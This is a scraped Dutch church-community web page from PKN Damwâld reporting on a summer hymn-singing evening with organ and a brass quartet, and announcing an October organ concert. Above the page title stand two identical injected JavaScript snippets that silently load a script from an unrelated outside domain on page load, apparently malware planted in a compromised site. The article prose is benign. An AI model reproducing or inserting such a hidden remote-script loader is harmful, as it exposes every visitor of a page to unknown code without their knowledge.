;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Samenzang voor herhaling vatbaar! - PKN Damwâld

Samenzang voor herhaling vatbaar!

Gepubliceerd op: maandag 26 juni

Zondagavond 25 juni stond in het teken van zingen. Het was dan ook niet zo gek dat de zangavond startte met een muzikale bijdrage van het lied “van U wil ik zingen”. Het orgel werd bespeeld door Margrietha Zagema en de familie Reitsma: vader, moeder, zoon en dochter uit Burdaard, bespeelden allen een blaasinstrument en vormden daarmee een prachtig koperkwartet. Eerder was de vraag aan u gesteld om uw favoriete lied op te geven. Daaraan hadden vele personen gehoor gegeven en konden wij als muziekcommissie met een flinke lijst liederen aan de slag. Van die lijst werd een programma gemaakt met twaalf liederen. Ondanks de tropische temperatuur op die dag, kon de muziekcommissie ruim zestig personen welkom heten. Om de warmte de baas te blijven en de kelen te smeren, werd aan iedereen een beker water uitgereikt. In blokjes van drie werden liederen gezongen van Johannes de Heer, de Evangelische liedbundel en het nieuwe liedboek. Al deze blokjes waren samengesteld in thema’s: vreugde, rust, vertrouwen en toekomst. De uitdrukking “se songen as lysters” was volledig op z’n plaats, er werd vol overgave gezongen! Als muzikale onderbreking werd orgelmuziek en muziek van het koperkwartet ten gehore gebracht. Het spontane applaus gaf aan dat de aanwezigen erg van de zangavond hadden genoten! Met een liedbewerking “Voorwaarts christenstrijders” van het koperkwartet werd de avond afgesloten. Vele positieve reacties na afloop geven aan dat de zangavond voor herhaling vatbaar is!

De vakanties staan voor de deur en ook de muziekcommissie zet de activiteiten in “zomerstand”. Maar we kunnen u vertellen dat er weer een prachtige nieuwe activiteit gepland staat! Op zaterdagavond 7 oktober heten we u graag welkom voor een orgelconcert van Gert van Hoef. Enkele jaren geleden heeft hij ook een fantastisch concert in de Ontmoeting gegeven, reden te meer om hem nogmaals uit te nodigen. Daarover meer in de volgende Paadwizer.